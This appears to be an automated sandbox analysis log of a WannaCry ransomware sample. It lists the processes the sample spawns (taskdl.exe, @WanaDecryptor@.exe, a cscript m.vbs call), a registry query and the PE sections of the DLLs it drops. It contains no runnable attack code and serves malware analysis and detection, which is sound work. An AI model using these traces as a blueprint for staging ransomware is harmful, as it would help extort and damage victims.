              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeWindow found: window name: RICHEDIT
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: libeay32.dll.69.drStatic PE information: section name: /4
              Source: libeay32.dll.69.drStatic PE information: section name: /19
              Source: libeay32.dll.69.drStatic PE information: section name: /31
              Source: libeay32.dll.69.drStatic PE information: section name: /45
              Source: libeay32.dll.69.drStatic PE information: section name: /57
              Source: libeay32.dll.69.drStatic PE information: section name: /70
              Source: libeay32.dll.69.drStatic PE information: section name: /81
              Source: libeay32.dll.69.drStatic PE information: section name: /92
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /4
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /19
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /31
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /45
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /57
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /70
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /81
              Source: libevent-2-0-5.dll.69.drStatic PE information: section name: /92
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /4
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /19
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /31
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /45
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /57
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /70
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /81
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: section name: /92
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /4
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /19
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /31
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /45
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /57
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /70
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /81
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: section name: /92
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /4
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: section name: /19
